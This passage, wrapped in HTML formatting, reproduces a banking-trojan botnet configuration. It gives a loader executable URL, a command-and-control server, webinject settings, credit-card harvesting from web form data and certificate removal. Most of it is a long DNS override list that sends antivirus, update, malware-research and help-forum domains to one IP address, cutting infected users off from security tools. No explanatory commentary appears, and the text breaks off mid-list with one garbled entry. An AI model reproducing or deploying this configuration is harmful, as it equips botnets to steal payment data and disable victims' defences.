other information please open the "Personal Manual"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;; IF YOU
DON'T KNOW HOW TO SETUP THESE OPTIONS, YOU CAN USE OPTIMAL DEFAULT CONFIG.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
<------------------ END OF SHORT MANUAL.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">entry
"StaticConfig"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> botnet "main"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> timer_config 15 20<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> timer_logs
7 20<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> timer_stats 10 20<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> timer_modules 7 10<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> timer_autoupdate 8<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> url_config1 "http : //gremlindefault.net/mainsession/game_install.bin"<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> remove_certs 1<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">; disable_tcpserver 0<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> disable_cookies 0<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> disable_httpgrabber 1<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> report_software 1<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> disable_antivirus 0<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> enable_luhn10_get 1<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> enable_luhn10_post 1<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> antiemulation_enable 0<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> encryption_key "*******************************"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> use_module_video 0<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">end<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">entry
"DynamicConfig"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> url_loader "http : //gremlindefault.net/mainsession/bbbllasw.exe"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> url_server "http : //gremlindefault.net/mainsession/redir.php"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> file_webinjects "webinjects.txt"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> entry "AdvancedConfigs"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> "http : //gremlindefault.net/mainsession/game_install.bin"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> end<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> entry "WebFilters"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> "!http : //*"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> end<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> entry "WebDataFilters"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> ;"http : //mail.rambler.ru/*"
"passw;login"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> end<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> entry "WebFakes"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> ;"http : //www.google.com" "http
: //www.yahoo.com" "GP" "" ""<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> end<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> entry "DnsFilters"<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bitdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download.bitdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">update.bitdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">wfbs51-p.activeupdate.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">wfbs60-p.activeupdate.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">iau.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">licenseupdate.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">csm-as.activeupdate.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">wfbs6-icss-p.activeupdate.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">oc.activeupdate.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">update.avg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">update.grisoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">backup.avg.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">backup.grisoft.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">files2.grisoft.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">files2.avg.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download.grisoft.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download.avg.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">akamai.grisoft.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">akamai.grisoft.cz.edgesuite.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">akamai.avg.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">akamai.avg.cz.edgesuite.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">akamai.grisoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">akamai.avg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">akamai.grisoft.com.edgesuite.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">akamai.avg.com.edgesuite.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">data-cdn.mbamupdates.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">su.pctools.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pctools.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download.lavasoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">secure.lavasoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">lavasoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bitdefender.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">virustotal.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">trendmicro.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">trendmicro.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.trendmicro.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">securesoft.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avira.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">gratissoftwaresite.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nod32.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pandasecurity.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">lavasoft.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avg.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">symantec-norton.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">housecall.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">forums.malwarebytes.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">malwarebytes.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pchelpforum.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pchelpforum.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">forums.cnet.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">techsupportforum.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">gratissoftware.nu=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">majorgeeks.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">forums.pcworld.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antivirus.microbe.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avast.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avg-antivirus.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nortonantiviruscenter.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">threatmetrix.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.zonealarm.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">firewallguide.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">auditmypc.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">comodo.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">free-firewall.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">schoonepc.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">iopus.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">tucows.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avg-antivirus-plus-firewall.en.softonic.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">superantispyware.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">superantispyware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">harveynorman.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ca-store.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">netfreighters.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">securetec.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">anti-spyware.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">virusscan.jotti.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">virscan.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antivir.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">analysis.avira.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">hijackthis.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">uploadmalware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">emsisoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">kaspersky.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bitdefender.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">eset.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">webroot.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">gdatasoftware.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pcpro.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">webroot.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">cyprotect.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">cloudantivirus.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">drweb-antivir.it=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">escanav.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">clamwin.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nod32.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">webroot.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">av.eu=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">vergelijk.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antivirusvergelijk.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">virussen.upc.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antivirus.startpagina.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avastav.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">defenx.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">gdata.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bitdefender.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">removevirus.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">windows.microsoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">answers.microsoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">myantispyware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">krebsonsecurity.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antivirus.about.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">cleanuninstall.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">staples.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">esetindia.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">mcafee.free-trials.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antivir-2012.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">panda-antivirus.en.softonic.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">softonic.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">freeantivirushelp.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">scanwith.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bestantivirusreviewed.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">virus-help.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">cleanallspyware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">kingsoftsecurity.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">threatfire.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">freeavg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">clamav.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pcthreat.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">2-viruses.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">trojan-killer.ne=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">virusinfo.info=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.virusinfo.info=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">projecthoneypot.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.projecthoneypot.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">novirus.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.novirus.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">anti-malware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.anti-malware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">offensivecomputing.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.offensivecomputing.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">zeustracker.abuse.ch=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.zeustracker.abuse.ch=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.malekal.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www3.malekal.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">forum.malekal.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.threatexpert.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">threatexpert.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.microsoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">update.microsoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.virustotal.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">virusscan.jotti.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.av-comparatives.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">av-comparatives.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">av-test.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.av-test.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.scanwith.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">trendmicro.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">kasperskyanz.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bitdefender.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">eset.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">vet.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">sm.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">home.mcafee.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">toolbar.avg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">stats.avg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.virusbtn.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">adwarereport.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avg.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.adwarereport.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">malwarebytes.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.malwarebytes.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dw.com.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nss-shasta-rrs.symantec.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">spywarewarrior.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.spywarewarrior.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avsoft.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avsoft.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">onecare.live.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">anubis.iseclab.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">wepawet.iseclab.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">iseclab.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.iseclab.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.freespaceinternetsec=209.85.229.104urity.com<o:p></o:p></span></div>
<div class="MsoNormal">
